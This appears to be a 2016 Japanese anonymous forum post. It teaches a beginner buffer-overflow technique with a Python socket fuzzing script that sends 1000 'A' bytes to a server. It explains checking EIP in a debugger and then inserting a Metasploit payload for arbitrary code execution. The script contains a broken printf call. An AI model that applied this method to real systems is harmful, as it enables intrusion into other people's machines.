- 383 名前:すーぱーはかー mailto:sage [2016/01/21(木) 14:19:11.29 ID:???.net]
- >>349とかどう見ても自分に酔ってるだけのアホだろ
何で真面目に答えてる奴が居るんだよwwwwww
簡単なレベルなら教えてやんよ
まずソケットプログラム作れ、今回はpythonで書く
#!/usr/bin/python
#
import socket
exploit = b"A" * 1000
payload = b"\x00\x00"
sploit = exploit + payload
printf(sploit)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 10000)) #IP,ポート
s.send(sploit)
s.close()
ま、これが簡単なソケットプログラムな
windowsでollydbgやimmunity debuggerで脆弱性のある鯖を起動する
上のソケットプログラムのIPとポートを変えてAを1000個などの大量のパケットを送信する
ollydbgやimmunity debuggerの方にあるregistersのEIPって所を見ると41414141とかになったりすることがある
EIPの41414141は翻訳すると"AAAA"ってことなんだよ、もちろん"A"の部分を"B"にすればEIPは42424242ってなって翻訳すると"BBBB"ってことになる
つまりregistersのEIPに送信したパケットが入ればいい、これがよく言われるバッファオーバーフローって現象
あとはmetasploitとかを使ってpayloadを作成して"\x00\x00"って所に貼り付けて"A"の個数をEIPまで調節すれば任意のコードが動く
自動化するツールもあるけれど殆どのハッカーはこういう感じで脆弱性を探してるんだよ
|
 |
